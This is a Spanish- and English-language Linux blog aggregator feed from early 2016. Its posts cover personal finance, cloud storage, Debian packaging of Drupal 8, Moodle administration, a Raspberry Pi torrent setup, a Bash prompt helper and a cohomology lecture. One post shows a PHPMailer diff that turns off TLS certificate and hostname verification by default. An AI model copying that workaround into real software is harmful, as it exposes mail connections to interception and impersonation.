Miércoles 10 de febrero de 2016

Itzcoalt Alvarez Moreno

Itzcoalt Alvarez Moreno
Itzcoalt (itz) Álvarez

Inversiones.

Hot:

La búsqueda constante para no perder el poder adquisitivo del poco dinero que se puede ahorrar, nos damos cuenta que realmente no contamos con muchas opciones.

 

Bancos.

La tasa de interés que un banco nos puede ofrecer, ronda entre el 3% al 5% ANUAL, es decir, si depositamos 100,000.00 en el banco el 1ero de enero, al 31 de diciembre tendremos en nuestra cuenta 103,000.00, un rendimiento de 3,000.00.

Eso es malo, pero se complica más cuando buscas la tasa de inflación anual, es decir, cuanto ha perdido tu dinero de poder adquisitivo por el incremento en los precios de los bienes que consumes, esta tasa de inflación está entre el 2% y 4 % para este año, de tal forma, tu tasa de interés real puede ser de 1% o -1% dependiendo del como quede la inflación anual.

El rendimiento del 1% es muy pobre, tal vez sea seguro, pero pobre.

 

CETES.

Los CETES o Certificados de Tesorería son documentos emitidos por el gobierno mexicano que sirven para financiar sus operaciones, por desgracia sucede el mismo escenario que los depósitos bancarios, la tasa de interés anual que ofrecen los CETES es similar o incluso inferior a la inflación.

 

Fondos de inversión.

Los fondos de inversión es un mecanismo por medio del cual un conjunto de personas o empresas deciden poner dinero en un fondo, y con este participar en inversiones en la bolsa, estas inversiones pueden generar rendimiento por arriba de la inflación o tener incluso perdidas.

Los fondos de inversión son administrados por profesionales y normalmente cobran una comisión por su administración.

Si bien el riesgo se incrementa, las posibilidades de reducir la pérdida del poder adquisitivo se reduce.

Existen muchos fondos de inversión, los cuales están diseñados para diferentes horizontes de inversión, o, mejor dicho, tiempo en el cual debes tener los recursos invertidos a fin de obtener un rendimiento aceptable.

 

Bolsa Mexicana de Valores (BMV)

En este caso, la inversión se realiza por medio de la compra de acciones de las empresas que cotizan en la bolsa, el riesgo como tal se incremente mucho más y se debe tener conocimiento del clima que reina en el sector de las empresas a invertir, sin embargo, los beneficios también pueden ser mucho más altos.

Para invertir en la BMV es necesario acercarnos a una Casa de Bolsa, quien realiza las operaciones a nuestro nombre, cobra una comisión por cada operación y en muchas ocasiones requieren cantidades mínimas de inversión.

Para muestra un botón, por favor analicen el rendimiento de las acciones de ICA, el grupo constructor de los últimos meses, ha perdido grandes cantidades, ello por la pérdida de su valor accionario, una inversión en una empresa de estas características representa pérdidas a largos plazo.

Alternativos.

Esto es en cuanto a los medios comunes de inversión, existen otros mecanismos que van a generar un rendimiento más alto, pero con un riesgo insano, la inversión en negocios particulares, la especulación con mercancías o bienes y servicios generar utilidades, sin embargo, el tiempo dedicado a estas actividades es alto, y es necesario evaluar el costo/beneficio.

 

 

 

 

 

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Como Instalar NGINX desde el código fuente en Ubuntu Server 14.04

Cuando hablas de instalar un ambiente de prueba, de aprendizaje o de puro gusto se habla de instalar Apache y hacer un apt-get install y listo a funcionar. Sin embargo cuando la cosa se pone seria y hay que poner … Continue reading

Jueves 04 de febrero de 2016

Itzcoalt Alvarez Moreno

Itzcoalt Alvarez Moreno
Itzcoalt (itz) Álvarez

YNAB y su cambio de modelo de negocio.

Hot:

YNAB (You Need A Budget) es un software diseñado para auxiliar en el control de las finanzas personales.

Desde hace algunos años, este software se vendía por un costo único y por una licencia de por vida, si bien el costo era algo alto, aun así vale la pena.

Sin embargo, YNAB a cambiado su modelo de negocio, entrado el esquema de software como servicio, y cobrando una renta mensual por el servicio.

El punto es: aun cuando el software cumple las expectativas, me parece que el costo mensual es alto.

Puedo entender la razón financiera para el cambio del modelo de negocio, sin embargo, el costo sigue siendo alto.

 

Miércoles 03 de febrero de 2016

Antonio de Dios

Antonio de Dios
Linux – Webadedios

Despidiéndome de Copy.com

Resulta que muchos servicios de guardado-almacenamiento en la nube de archivos han ido menguando sus operaciones, ya sea limitando características, mermando el espacio disponible o sencillamente dejando de prestar sus  servicios

Un servicio con el que me encontraba muy contento era copy de copy.com que desgraciadamente deja de funcionar en un mes y me deja en el predicamento de buscar un nueo sitio que me de las funciones que necesito

copyfin

En estos momento ando probando pCloud,que al menos ofrece lo menos que necesito, y es que el poblema como usuario linux es que requiero no solo el espacio en la nube de mas de 7 gb, necesito que tenga programa en android y también y, muy importante, un programa en linux para que sincronice automáticamente la carpeta con los archivos que vaya modificando

Lo que mas me afecta es la carencia del programa de escritorio en linux en varios servicios de almacenamiento en la nube, y aunque el de pCloud es extremadamente básico y solo tienen versión para ubuntu-debian (mi otra pc la tengo en Arch), pues al menos salgo al paso en lo que mas uso

estoy de plano animándome a instalar ownclud aunque sea en casa pero si estoy en la misma red pues prefiero el rsync como estoy usándolo actualmente (de mi pc arch a lap debian)

En fin, en este momento buscando esa aplicación que tenga un programa de escritorio que funcione bien en linux, que sirva perfectamente en android, no es mucho pedir

  • uso dropbox pero se me queda corto el espacio, por lo que de plano lo deje para guardar las fotografías que tomo del celular
  • pCloud en pruebas me esta funcionando adecuadamente

Para obtener una cuenta de Dropbox
Para obtener una cuenta de pCloud

Alcance Libre: Disponibles MATE 1.12 y Xfce 4.12 para CentOS 7 y Red Hat Enterprise Linux 7.

Martes 02 de febrero de 2016

Itzcoalt Alvarez Moreno

Itzcoalt Alvarez Moreno
Itzcoalt (itz) Álvarez

Interrupción del servicio.

Hot:

Por un problema de tráfico, el blog fue suspendido por unos dias.

Afortunadamente ya estamos de regreso.

 

Promoviendo Software Libre: Idioma español en Knoppix

Domingo 24 de enero de 2016

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Como Instalar Mame en Ubuntu y Linux Mint

Para los que nos tocó ir a un galería Arcade para pasarnos un buen rato en los video juegos sabemos lo que era estar en una “red social” real sobre batir records y ver leyendas, que digo leyendas, “héroes” que … Continue reading

Sábado 23 de enero de 2016

Bits of code

And a hack, if you happen to have a Moodle 2.6.x with phpmailer old library and you had php5.6.x you may find if you use ssl/tls to send mail that now php is strictier with self signed certificates, well there are good documentation on php.net about [1] and [2] but not really a clue on what you need to do exactly, for that serverfault offered a better answer [3], not to mention that toke me like 2 hours of reading logs, my own doc on changes, receive a call from my co admin at work for Moodle as he received a lot of mail asking why things where broken, mostly lost|forgotten passwords. At last thinking on the way Moodle uses mail got with the right file, now search how to implement after tried to modify directly, got more time to read and found where it connects finally, so there also exists $options variable to add well options, so I did.

$git diff class.phpmailer.php
diff --git a/lib/phpmailer/class.phpmailer.php b/lib/phpmailer/class.phpmailer.php
index fe37a93..414d2e8 100644
--- a/lib/phpmailer/class.phpmailer.php
+++ b/lib/phpmailer/class.phpmailer.php
@@ -1222,7 +1222,12 @@ class PHPMailer
* @throws phpmailerException
* @return bool
*/
- public function smtpConnect($options = array())
+ public function smtpConnect($options = array(
+ 'ssl'=>array(
+ 'verify_peer' => false,
+ 'verify_peer_name' => false,
+ 'allow_self_signed' => true)
+ ))
{
if (is_null($this->smtp)) {
$this->smtp = $this->getSMTPInstance();

And voila, we are live again, if you wonder why we need to send mail via tls from another host, well is a long history, but made short Azure not providing reverse resolution from their web panel [4] or from their powershell implementation on Linux also our contact in .mx where unable to provide, info|fix|doc|options to get our mail not marked as bulk from no other that outlook.com go figure.

Had to admit that I was planning to begin the weekend very different doing something really different :/ but as this early morning update our production server with the well tested config on our dev machine… that don’t need to send mail :P at least wasn’t tomorrow, that a large course with self enrolment begins, that will have been overkill and not nice.

[1] http://php.net/manual/en/migration56.openssl.php
[2] http://php.net/manual/en/context.ssl.php
[3] http://serverfault.com/questions/660241/postfix-tls-error
[4] https://azure.microsoft.com/en-us/blog/announcing-reverse-dns-for-azure-cloud-services/

Viernes 22 de enero de 2016

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

Shared Projects or PCL?

My colleague Jason Smith has shared his views on what developers should use when trying to share code between projects. Should you go with a Shared Project or a Portable Class Library (PCL) in the world of Xamarin.Forms?

He hastily concludes that you should go with PCLs (pronounced Pickles).

For me, the PCL is just too cumbersome for most uses. It is like using a canon to kill a fly. It imposes too many limitations (limited API surface), forces you to jump through hoops to achieve some very basic tasks.

PCLs when paired with Nugets are unmatched. Frameworks and library authors should continue to deliver these, because they have a low adoption barrier and in general bring smiles and delight to their users.

But for application developers, I stand firmly on the opposite side of Jason.

I am a fan of simplicity. The simpler the technology, the easier it is for you to change things. And when you are building mobile applications chances are, you will want to make sweeping changes, make changes continously and these are just not compatible with the higher bar required by PCLs.

Jason does not like #if statements on his shared code. But this is not the norm, it is an exception. Not only it is an exception, but careful use of partial classes in C# make this a non issue.

Plugging a platform specific feature does not to use an #if block, all you have to do is isolate the functioanlity into a single method, and have each platform that consumes the code implement that one method. This elegant idea is the same elegant idea that makes the Linux kernel source code such a pleasure to use - specific features are plugged, not #ifdefed.

If you are an application developer, go with Shared Projects for your shared code. And now that we support this for F#, there is no reason to not adopt them.

Jueves 21 de enero de 2016

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Ubuntu está dominando la Nube

La apariencia de que Ubuntu está perdiendo terreno y popularidad no es diferente a lo que pasó hace años con Red Hat. Cuando una de las distribuciones mas populares decidió enfocar sus esfuerzos en segmento de los servidores y dejar … Continue reading

Sábado 16 de enero de 2016

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

snap – A modern and performant telemetry framework

Registrate




With the increasing number of connected devices, the need to make more informed compute workload scheduling and orchestration decisions is critical. It is strategically important that telemetry data be exposed with reduced friction to the existing and emerging cloud and data center decision systems (e.g. schedulers) so that they can make the most informed decisions possible. The work demonstrated in this session introduces snap a modern framework for collecting, processing and publishing telemetry data. The solution is meant to have a wide audience, appealing to anyone interested in consuming, producing or processing metric and telemetry data.

Viernes 15 de enero de 2016

Aldo Rivadeneira

Aldo Rivadeneira
linux – Solo un log

Inicio de un blog técnico

Quiero iniciar un blog técnico con toda la investigación que llevo de todo este tiempo.
Primer cuestionamiento: tengo un dominio , puedo generar un subdominio pero el hosting de wordpress me pide $$ para poder agregar mi *.dominio. Valdrá la pena?
Segundo cuestionamiento: puedo contratar un hosting e instalar un CMS, dirigir mi *.dominio a el y listo. Valdrá la pena?


Jueves 14 de enero de 2016

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

getline.cs update: Partying like it is 1992

Back in 2008, I wrote about getline.cs, a single-file command line editor for shell application. It included Emacs key bindings, history, customizable completion and incremental search. It is equivalent to GNU's readline library, except it is implemented in a single C# file.

I recently updated getline.cs to add a popup-based completion and C# heuristics for when to automatically trigger code completion. This is what it looks like when using in Mono's C# REPL in the command line:

Martes 12 de enero de 2016

Actualizando Moodle

Moodle de 2.7.11 a 2.7.12

/usr/share/moodle# git pull
remote: Counting objects: 69, done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 69 (delta 51), reused 54 (delta 38), pack-reused 0
Unpacking objects: 100% (69/69), done.
From https://github.com/moodle/moodle
d27a325..3f85661 MOODLE_27_STABLE -> origin/MOODLE_27_STABLE
* [new tag] v2.7.12 -> v2.7.12
Updating d27a325..3f85661
Fast-forward
admin/environment.xml | 1 –
enrol/externallib.php | 13 ++++++++++—
enrol/self/externallib.php | 12 +++++++++—
enrol/self/tests/externallib_test.php | 14 +++++++++++++-
enrol/tests/externallib_test.php | 15 ++++++++++++++-
install/lang/bg/admin.php | 1 +
install/lang/cs/install.php | 2 +-
install/lang/he/admin.php | 2 +-
install/lang/he/install.php | 6 +++—
install/lang/hr/admin.php | 2 +-
install/lang/hr/error.php | 2 +-
install/lang/hr/install.php | 6 +++—
install/lang/zh_cn/error.php | 3 ++-
version.php | 4 ++–
14 files changed, 61 insertions(+), 22 deletions(-)

Actualización 22/01/2016: Como bien menciona Gunnar en los comentarios, aún falta hacerle saber a Moodle que han cambiado sus archivos y si requiere cambios en la base de datos que los lleve a cabo también los realice para esto, la mejor forma es:

sudo -u www-data /usr/share/moodle/admin/cli/upgrade.php

En mi caso vale la pena decir que seguí mucho de la estructura del ultimo empaquetado de Moodle en Debian, pero he de decir que he estado bastante desconectado de varias cosas en el mismo.

Ahora si, listo.

Dato de trivia, por qué mi origen es github y no git.moodle.org, el lindo firewall que se supone no existe tiene bloqueado el puerto 9418, problema similar tengo con ntp.

De veras que vale más ampliar la documentación de esto y de paso fijarse en si ya esta traducido también.

https://docs.moodle.org/27/en/Git_for_Administrators

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

Readying up for the second "Embedded Linux" diploma course

I am happy to share here a project I was a part of during last year, that ended up being a complete success and now stands to be repeated: The diploma course on embedded Linux, taught at Facultad de Ingeniería, UNAM, where I'm teaching my regular classes as well.

Back in November, we held the graduation for our first 10 students. This photo shows only seven, as the remaining three have already relocated to Guadalajara, where they were hired by Continental, a company that promoted the creation of this specialization program.

After this first excercise, we went over the program and made some adequations; future generations will have a shorter and more focused program (240 instead of 288 hours, leaving out several topics that were not deemed related to the topic or were thoroughly understood by students to begin with); we intend to start the semester-long course in early February. I will soon update here with the full program and promotional material, as soon as I receive it. update (01-19): You can download the promotional information, or go to an (unofficial) URL with the full information. We are close to starting the program, so hurry!

I am specially glad that this course is taught by people I admire and recognize, and a very interesting mix between long-time academic and stemming from my free-software-related friends: From the academic side, Facultad de Ingeniería's professors Laura Sandoval, Karen Sáenz and Oscar Valdez, and from the free-software side, Sandino Araico, Iván Chavero, César Yáñez and Gabriel Saldaña (and myself on both camps, of course ☺)

AttachmentSize
OT401_nota.jpg75.82 KB
Linux Embebido - Folleto.pdf455.32 KB

Domingo 10 de enero de 2016

Alcance Libre: Nginx con soporte para perl.
Alcance Libre: Autenticación de squid a través de PAM con los usuarios del sistema.

Miércoles 06 de enero de 2016

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

Starting work / call for help: Debianizing Drupal 8

I have helped maintain Drupal 7.x in Debian for several years (and am now the leading maintainer). During this last year, I got a small article published in the Drupal Watchdog, where I stated:

What About Drupal 8?

Now... With all the hype set in the future, it might seem striking that throughout this article I only talked about Drupal 7. This is because Debian seeks to ship only production­ ready software: as of this writing, Drupal 8 is still in beta. Not too long ago, we still saw internal reorganizations of its directory structure.

Once Drupal 8 is released, of course, we will take care to package it. And although Drupal 8 will not be a part of Debian 8, it will be offered through the Backports archive, following all of Debian's security and stability requirements.

Time passes, and I have to take care of following what I promise. Drupal 8 was released on November 18, so I must get my act together and put it in shape for Debian!

So, prompted by a mail by a fellow Debian Developer, I pushed today to Alioth the (very little) work I have so far done to this effect; every DD can now step in and help (and I guess DMs and other non-formally-affiliated contributors, but I frankly haven't really read how you can be a part of collab-maint).

So, what has been done? What needs to be done?

Although the code bases are massively different, I took the (un?)wise step to base off the Drupal7 packaging, and start solving Lintian problems and installation woes. So far, I have an install that looks sane (but has not yet been tested), but has lots of Lintian warnings and errors. The errors are mostly of missing sources, as Drupal8 inlines many unrelated projects (fortunately documented and frozen to known-good versions) in it; there are two possible courses of action:

  1. Prefered way: Find which already made Debian package provides each of them, remove from the binary package, declare dependency.
  2. Pragmatic way: As the compatibility must sometimes be to a specific version level, just provide the needed sources in debian/missing-sources

We can, of course, first go pragmatic and later start reviewing what can be safely depended upon. But for this, we need people with better PHP experience than me (which is not much to talk about). This cleanup will correspond with cleaning up the extra license file Lintian warnings, as there is one for each such project — Of course, documenting each such license in debian/copyright is also a must.

Anyway, there is quite a bit of work to do. And later, we have to check that things work reliably. And also, quite probably, adapt any bits of dh-make-drupal to work with v8 as well as v7 (and I am not sure if I already deprecated v6, quite probably I have).

So... If you are interested in working on this, please contact me directly. If we get more than a handful, building a proper packaging team might be in place, otherwise we can just go on working as part of collab-maint.

I am very short on time, so any extra hands will be most helpful!

Lunes 04 de enero de 2016

Óscar A. Parra V.

Óscar A. Parra V.
El Canibal » Geek

Instalando cliente Torrent en Pi

Ahora, lo que vamos a hacer, es instalar un cliente Torrent en la Pi

Existen varios, entre los que se pueden instalar son rtorrent, transmission pero yo usare deluge

Deluge es un cliente multiplataforma con una interfase remota.

para instalarlo daremos lo siguiente:

sudo apt-get install deluged -y && sudo apt-get install deluge-console -y && sudo apt-get install deluge-web

ya instalado, debes asegurarte que estas con el usuario de pi

id -nu

te debe arrojar pi

corremos deluged para que haga el setting inicial y luego matamos el proceso

deluged
sudo pkill deluged

vamos a respaldar el arcivo de configuracion y luego vamos a editarlo

cp ~/.config/deluge/auth ~/.config/deluge/auth.old
nano ~/.config/deluge/auth

agregaremos usuario:password:acesso del 1 al 10

pi:mipassword:10

luego iniciamos deluge y la consola

deluged
deluge-console

luego agregamos estas lineas en la consola de deluge

config -s allow_remote True
config allow_remote
exit

reiniciamos deluged

sudo pkill deluged
deluged

 

Domingo 03 de enero de 2016

The phd movie 2

Creo que este año que acabó no hubo proyecciones en nuestro país o al menos me enteré y seguí menos el asunto ya que cuando salió la primera no obtuve respuesta de los encargados de gestionar esto en mi universidad, en fin para abrir boca un par de trailers uno que a cualquier estudiante ya sea de licenciatura, maestría o doctorado tendrá que pasar.

Y claro el trailer official, por supuesto.

Ya he escrito antes de la campaña de crowfunding para llevar a cabo esta película y tan solo pongo los links y la imagen que es realmente buena, pueden ver en streaming la pelicula por 5USD. O pueden disfrutar del webcomic totalmente gratis en phdcomics.

phd120715s

Jueves 31 de diciembre de 2015

Omar Hernández Sarmiento

Omar Hernández Sarmiento
-- tekini --

Ian Murdock

Ian Murdock, creador de la distribución y del proyecto Debian, falleció. Una gran pena embarga al mundo del software libre.

Martes 29 de diciembre de 2015

Mario Oyorzábal

Mario Oyorzábal
blog – TuXsOuL

sport billy …

Hace tiempo traigo en la cabeza una idea, quién no a visto “inception” (“origen”), esto me sucedía cada vez que recordaba las caricaturas de los 80’s; dado que es posible ahora ir a Youtube y realizar una búsqueda muy original de por ejemplo: “caricaturas de los 80 en mexico“.

Pero al ver esa lista y listas, existía algo que me inquietaba, hasta que con el tiempo iba recordando fragmentos, de lo que creía yo era una caricatura, pero lamentablemente recordaba muy poco, si leíste bien “fragmentos”.

Hasta que un día recordé, una maleta y objetos que al estar fuera de ella se agrandaban, era como si en el baño al pegarme con el lavamanos, se dibujara en mi mente el “condensador de flujo”.

Por ahí comencé mi búsqueda, hasta que por fin di, con lo que me interesaba buscar.

sport billyLa caricatura de “Sport Billy“, una serie que vi por televisión hace ya tiempo, llamo mucho mi atención y fue de las series que me marcaron, llevándome a lo que hoy me gusta y me fascina que es la tecnología, la ciencia, la física, etc., etc., aunque en ocasiones no entienda ni una sola palabra.

La historia gira alrededor de “Sport Billy”, originario del planeta “Olympus”, sus habitantes son parecidos a los dioses griegos, por ser atléticos; “Sport Billy” junto con “Lilly” y “Willy”, viajan a través del tiempo y lugares, promoviendo el trabajo en equipo y el deporte, luchando contra la reina “Vanda” y su ayudante “Snipe”.

Pero que hace a esta serie tan especial para mí, bueno solo dos cosas (gadgets) interesantes.

El primero, una máquina del tiempo, la cual tiene forma de reloj despertador, con ella se puede viajar a cualquier parte, pero lo mas importante no era el donde, si no el cuando.

sport_billy_time_machineEl segundo, pero no menos importante, es el “omni-sack”, una diminuta maleta, que puedes traer en la bolsa de tu pantalón.

Supongamos, que necesitas un automóvil, para salir escapando, porqué los villanos te persiguen, bueno, primero hay que sacar el “omni-sack”, en ese momento este adquirirá su tamaño normal, ahora introduces tu mano y una vez que encuentras un automóvil de juguete lo sacas y lo colocas en el piso, en un instante ese pequeño automóvil, ajustara su tamaño para que puedas utilizarlo.

Lo anterior ahora lo hemos visto, ¿te suena la partícula “pym”?, al parecer el “omni-sack” puede utilizar ese principio, dado el gran espacio con el que cuentan en su interior los átomos, otra podría ser, nano-tecnología, ya que son objetos inanimados que pueden ajustarse a su tamaño como si fuesen pequeños transformers, sin olvidar que tambien el “omni-sack” parece algún tipo de impresora 3D ya que puedes sacar de ella lo que necesites.

sport_billy_omni_sackPor si fuera poco, “Sport Billy” no tenia que preocuparse por estacionar su máquina del tiempo, ¿adivinaste?, por que puede guardarla en el “omni-sack”, en algunos capítulos recuerdo que eso hacia.

La serie tuvo pocos episodios, al menos eso recuerdo en México, por lo que se puede corroborar en internet.

En cuanto a la música de esta y otras caricaturas de la época, fue interpretada también por el Sr. “Memo Aguirre” (twitter).

Una cosa interesante y lamentable, es que haciendo búsquedas en la red, es posible encontrar muy pocos de los episodios, claro esta, juntando todos los disponibles en varios idiomas, ignoro si esto sucede por alguna razón especial.

Los pocos vídeos que se encuentran en Youtube, siguen aún disponibles, pero por cuestión de derechos de autor y un sin fin de etc., etc., es posible que desaparezcan.

La verdad es agradable recordar este tipo de cosas, que subconsciente tan latoso tengo :-P.

¿Y tu recuerdas alguna caricatura en especial?.

La entrada sport billy … aparece primero en TuXsOuL.
Regálele un café al autor a través de bitcoin: 16pVAeNnMKRhfsNd9AGw8ioqWxCaRAfiGS.

HowTo: Ask questions in Bash?

I’ve been writing some script to configure some firewall and came up with this way of asking a question in Bash. I hope it helps as an example. Feel free to contribute your own:

#!/usr/bin/env bash

ask() {
    local query=$1

    if ( echo $query | grep -qi password ); then
        read -s -p "$query: " answer
        echo
    else
        read -p "$query: " answer
    fi

    return 0
}

ask 'What is your name?'

echo
echo "Hello, $answer"

ask 'Please, give me your password'

echo
echo "Access granted"

As you can devise from the script, “$answer” is a global; which will get overwritten if you use ask() again. In case you want to make several questions, just reassign the var to another one:

ask 'What is your first name?'
firstname=${answer^}

ask 'What is your last name?'
lastname=${answer^}

echo
echo "Nice to meet you, $firstname $lastname!"

So, this gives you an idea. I’d check this article to learn some defensive Bash programming; which I am just starting to absorb: http://www.kfirlavi.com/blog/2012/11/14/defensive-bash-programming/

Lunes 28 de diciembre de 2015

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Cohomología de Monsky-Washnitzer y punto fijo de Lefschetz (parte 1 Cohomología Grothendieck-deRham Algebraico)

Este es el último post de este año, mañana me voy de vacaciones a Israel pero vine a la oficina en 28 de diciembre para no sentirme culpable de estar en el mar muerto flotando y no continuando mis algoritmos y proyectos pendientes para mi trabajo de investigación en mi actual casa académica que es el Instituto Johann Bernoulli en los Países Bajos.

Parte de lo que estoy investigando tiene que ver con contar soluciones $latex \mathbb{F}_q$-racionales de jacobianas de curvas hiperelípticas de género 2, como ya lo he mencionado en posts anteriores, esto es importante, por razones prácticas y por razones puramente matemáticas.

En cuanto a las razones prácticas tenemos que estas jacobianas de curvas hiperelípticas están consideradas para suplir en un futuro a las curvas elípticas en criptografía, por lo que necesitamos ver maneras de extraer la cardinalidad de su conjunto de soluciónes con el fin de poder ver si el grupo abeliano asociado a la curva es seguro en términos criptográficos. Esta cardinalidad nos dará la traza del endomorfismo de Frobenius, y por lo tanto, podemos obtener también la cardinalidad de la curva hiperelíptica.

Las razones matemáticas son la riqueza matemática que conlleva poder conocer esto, ahora vamos a definir una teoría de cohomología útil para teoría de números que nos permite contar puntos, y que nace de la Cohomología de DeRham algebraica propuesta por Alexander Grothendieck así como del trabajo de Dwork quien probó que la función Zeta de una variedad algebraica sobre un campo finito es simplemente un cociente de polinomios.

Lo que queremos es que con esta teoría de Cohomología dada por Monsky-Washnitzer poder encontrar explícitamente la función zeta de una variedad $latex X$ sobre un campo finito $latex \mathbb{F}_q$ con $latex q=p^n$, esta cohomología es la misma que la de deRham algebraica pero aplicada a un anillo especial.

$latex \zeta_{\mathbb{F}_q}(t)=\exp{\sum_{s\geq 1} \frac{|X(\mathbb{F}_{q^s})|}{s}q^{-st}}$

Donde $latex |X(\mathbb{F}_{q^s})|$ denota el número de puntos racionales de $latex X$ en la extensión de grado $latex s$ de $latex \mathbb{F}_q$.

Queremos contar puntos, y un ingrediente crucial es el teorema del punto fijo de Lefschetz, que es la generalización del teorema del punto fijo de Brouwer el cual expuse aquí en mi blog, este teorema en nuestro contexto nos dice básicamente que si $latex X$ es una variedad sobre un campo finito $latex \mathbb{F}_q$ y si $latex \bar{X}$ es el levantamiento (lifting) de $latex X$ a $latex \bar{\mathbb{F}_q}$ , sabemos que el endomorfismo de frobenius $latex \Phi_q$ va a mapear puntos con coordenadas $latex x_1,...,x_n$ a el punto con coordenadas $latex x_1^q, ..., x_n^q$, entonces los puntos fijos que $latex \Phi_q:\bar{X}\rightarrow\bar{X}$ son exactamente los puntos $latex X$ (porque Frobenius se comporta como la identidad en los puntos $latex \mathbb{F}_q$-racionales) entonces el teorema del punto fijo de Lefschetz implica que en el caso de que $latex X$ sea suave y bien portada como variedad:

$latex |X(\mathbb{F}_q)|=q^{\text{Dim }X} \sum_i (-1)^i Tr(\Phi_q)^{-1}|H^{i}(\bar{X},\mathbb{Q}_l)$

La cohomología que usaremos será la cohomología de deRham algebraica aplicada a un anillo especial que es un lifting (levantamiento) del anillo de coordenadas, hoy definiremos la cohomología de deRham y los problemas que nos va a causar no trabajar en el Lifting.

Hoy nos enfocaremos a construir esta cohomología definida en GAGA por Alexander Grothendieck, para cualquier anillo de tipo finito, que será la base de la cohomología de Monsky-Washnitzer aplicada a un anillo en específico.

Primero que todo, $latex \mathbb{K}$ es un campo perfecto y $latex A$ una $latex \mathbb{K}$-álgebra finitamente generada, que en el caso práctico puede ser un anillo de coordenadas de una variedad $latex X$ cuyas coordenadas a veces denotaremos como $latex \bar {x_i}$ para $latex i\leq n$ por lo que $latex A=\mathbb{K}[\bar{x_1},...,\bar{x_n}]=\mathbb{K}[x_1,...,x_n]/\langle f_1,...,f_r \rangle=\mathbb{K}[X]$ donde $latex X$ está definido por $latex \lbrace f_i \rbrace_{i=1}^{r}\subset \mathbb{K}[x_1,...,x_n]$ irreducibles sobre $latex \mathbb{K}$.

Cohomología de DeRham algebraica con diferenciales de Kähler

Ahorita queremos transportar el cálculo diferencial y análisis a álgebra, por lo que definiremos en abstracto lo que es una derivada y los diferenciales de un anillo de cierto modo generalizados, simplemente pidiendo simbólicamente la regla de Leibniz en este caso sobre el anillo de funciones de una variedad, donde la función de derivación sobre el álgebra finitamente generada será naturalmente heredada con la derivación parcial en cada variable de los polinomios.

Definición: $latex \Omega_{A/\mathbb{K}}$  es el $latex A$-módulo de diferenciales de Kähler, es decir, vamos a tomar $latex \forall a\in A$ los símbolos $latex\space da$ y las siguientes relaciones.

* $latex \space dk=0$ para $latex k\in\mathbb{K}$
* $latex d(a+b)=da+db$ 
* $latex d(ab)=a\cdot db+b\cdot da$ donde $latex a,b\in A$

Por ejemplo, si tenemos que $latex A$ es el anillo de coordenadas de $latex X$ una curva dada por la intersección de irreducibles, es decir, $latex f_1,..,f_r \in \mathbb{K}[x_1,...,x_n]$ entonces:

$latex A=\mathbb{K}[x_1,...,x_n]/\langle f_1,...,f_r\rangle$
Entonces tenemos que explícitamente:

$latex \Omega_{A/\mathbb{K}}=\bigoplus _{i=1}^{n} Adx_i /\langle f_1,...,f_r \rangle$

donde $latex df:=\sum_{j=1}^n \frac{\partial f}{\partial x_j} dx_j$ (Derivada total)

Es decir, como $latex A=\mathbb{K}[\bar{x_1},...,\bar{x_n}]$, tenemos que $latex \Omega_{A/\mathbb{K}}$ es un módulo libre en los generadores $latex d\bar{x_1},...,d\bar{x_n}$ y nota que el álgebra $latex A=\mathbb{K}[\bar {x_1},...,\bar{x_n}]$ está generada como una $latex \mathbb{K}$-álgebra por $latex \bar{x_1},...,\bar{x_n}$ por lo que $latex \Omega_{A/\mathbb{K}}$ esta generado como $latex \mathbb{K}[\bar{x_1},...,\bar{x_n}]$-módulo por $latex d\bar{x_1}, .., d\bar{x_n}$.

Existen muchas derivadas, pero la más natural $latex d:A\rightarrow \Omega_{A/\mathbb{K}}$ es la que manda $latex a\mapsto da$.

Como dije anteriormente, hay muchas derivadas, pero eso no perjudica la unicidad de $latex \Omega_{A/\mathbb{K}}$ ya que si nos encontramos con otra derivación $latex \mathbb{K}$-lineal $latex D:A\rightarrow M$ , ésta se factoriza de manera única como $latex A\xrightarrow{d}\Omega_{A/\mathbb{K}}\rightarrow M$.

De hecho si $latex A=\mathbb{K}[x_1,...,x_n]$ es el anillo de polinomios en $latex n$ variables, (es decir, el anillo de coordenadas del espacio afín $latex \mathbb{A}^n$ tenemos que $latex \Omega_{A/\mathbb{K}}\cong \bigoplus_{i=1}^n A$ , esto lo pueden demostrar ustedes utilizando el mapeo $latex A\rightarrow \bigoplus_{i=1}^n A$ dado por $latex f\mapsto (\frac{\partial f}{\partial x_1},...,\frac{\partial f}{\partial x_n})$ y notando que es una derivada $latex \mathbb{K}$-lineal y que el mapeo $latex \phi:\Omega_{A/\mathbb{K}}\mapsto \bigoplus_{i=1}^n A$ dado por $latex df\mapsto (\frac{\partial f}{\partial x_1},...,\frac{\partial f}{\partial x_n})$ es un isomorfismo con inverso $latex \psi:\bigoplus_{i=1}^n A \rightarrow \Omega_{A/\mathbb{K}}$ dado por $latex (f_1,...,f_n)\mapsto \sum_{i=1}^n f_idx_i$.

Una observación "geómetra algebraica" es que la curva definida por el álgebra $latex A$ (su anillo de coordenadas) , por más abstracto que sea esto y por más raro o más típico que sea el campo $latex \mathbb{K}$ es suave, sin singularidades extrañas en su geometría, entonces $latex \Omega_{A/\mathbb{K}}$ es un módulo localmente libre de rango exactamente la dimensión de Krull del anillo $latex A$ que coincide con la dimensión topológica de la variedad $latex X$ asociada al álgebra $latex A$.  


Ahora vamos a construir los grupos de cohomología, para esta parte es necesario que entiendas lo que es el producto cuña $latex dx_i\wedge dx_j$, yo aquí lo expongo con ejemplos y de manera geométrica.


Definición: Sea $latex \Omega^k_{A/\mathbb{K}}=\bigwedge_{i=1}^k \Omega_{A/\mathbb{K}}$ , es decir en particular $latex \Omega^{0}_{A/\mathbb{K}}=A$ y $latex \Omega^{1}_{A/\mathbb{K}}=\Omega_{A/\mathbb{K}}$


Y construyamos el complejo de cadenas dado por 

                 $latex d_{k}:\Omega^{k-1}_{A/\mathbb{K}}\rightarrow \Omega^{k}_{A/\mathbb{K}}$ 
$latex f_0 df_1\wedge ... \wedge df_{k-1}\mapsto df_0\wedge df_1\wedge ... \wedge df_{k-1}$

